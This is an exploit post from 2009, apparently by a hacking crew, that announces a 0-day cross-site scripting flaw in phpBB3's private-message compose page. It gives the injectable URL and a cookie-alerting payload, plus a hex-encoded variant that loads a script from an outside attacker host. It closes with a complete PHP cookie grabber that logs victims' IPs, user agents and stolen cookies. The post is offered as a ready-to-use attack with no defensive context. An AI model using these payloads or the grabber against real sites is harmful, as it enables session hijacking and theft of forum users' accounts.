phpbb3-xss.txt
Posted on 05 March 2009
XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] ###################################################################################### # # # Authors: Dante90, WaRWolFz Crew # # T0T4L, Ex Member Crew # # Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] # # MSN: dante90.dmc4@hotmail.it # # Web: www.warwolfz.org # # # ###################################################################################### XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] [code] http://www.victimesite.org/ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=[page] [/code] Where is: [code] [xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))} [page] = Page of your PM [/code] Redirect Code [Ascii --> Hex]: [code] [xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f%72%67%2f%66%69%6c%65%2e%6a%73%3e (<script src=http://www.evilsite.org/WaRWolFz/file.js>) [/code] COOKIES GRABBER [code] <?php $ip = $_SERVER['REMOTE_ADDR']; $referer = $_SERVER['HTTP_REFERER']; $agent = $_SERVER['HTTP_USER_AGENT']; $data = $_GET['warwolfz']; $time = date("Y-m-d G:i:s A"); $text = "Time: ".$time." IP:".$ip." Referer:".$referer." User-Agent:".$agent." Cookie:".$data." "; $file = fopen('cookies.html' , 'a'); fwrite($file,$text); fclose($file); ?> [/code] Dante90 _________________________________________________________________ Portati avanti: scarica Messenger 2009! http://clk.atdmt.com/GBL/go/136430507/direct/01/
